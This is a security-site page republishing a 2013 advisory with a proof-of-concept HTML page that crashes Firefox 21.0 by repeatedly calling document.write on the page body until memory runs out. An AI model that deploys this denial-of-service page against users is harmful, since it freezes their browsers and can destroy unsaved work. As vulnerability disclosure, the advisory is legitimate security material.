首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mozilla Firefox 21.0 Denial Of Service
来源:jigsaw0658@gmail.com 作者:Jigsaw 发布时间:2013-06-24  
Title : Mozilla Firefox Browser 21.0 Remote Denial Of Service 
Author : Jigsaw (Abdelmorite Eljoaydi)
Date : 22-06-2013
E-mail : jigsaw0658@gmail.com
Home : Morroco 
Facebook page : facebook.com/abdelmorit.alma
platform : software
Impact : Denial Of Service ( all tabs are no longer accessible, your work might be lost)
Tested on : Mozilla Firefox 21.0 the latest release
OS : Tested on Windows 7/ Windows XP     
Risk : Low[+] / Medium[-]


===========================================================================================
#Vulnerability:

This bug is a typical result of endless dialog loop.
The flaw exists when the attacker put document.write(document.body.innerHTML)
in multitudinous loop that make the browser Unable to handle this exception and fall in Out of Memory.
User interaction is required to exploit this vulnerability in that the target must visit a malicious web page.

============================================================================================
#Proof of Concept:

<html>
<body>
<script>
document.write("")
</script>
</body>
<script>
var i=0;
for (i=0;i<=99;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>
</html>
================================================================================================

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HP System Management Homepage
·FreeBSD 9.0+ Privilege Escalat
·LibrettoCMS File Manager Arbit
·PEiD 0.95 Memory Corruption
·Seowonintech Remote Root Explo
·AudioCoder 0.8.22 - Direct Ret
·Sami FTP Server 2.0.1 RETR Den
·Seowonintech Devices - Remote
·ZPanel 10.0.0.2 htpasswd Modul
·MoinMoin twikidraw Action Trav
·Novell Client 4.91 SP4 nwfs.sy
·Telnet-Ftp Service Server 1.0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved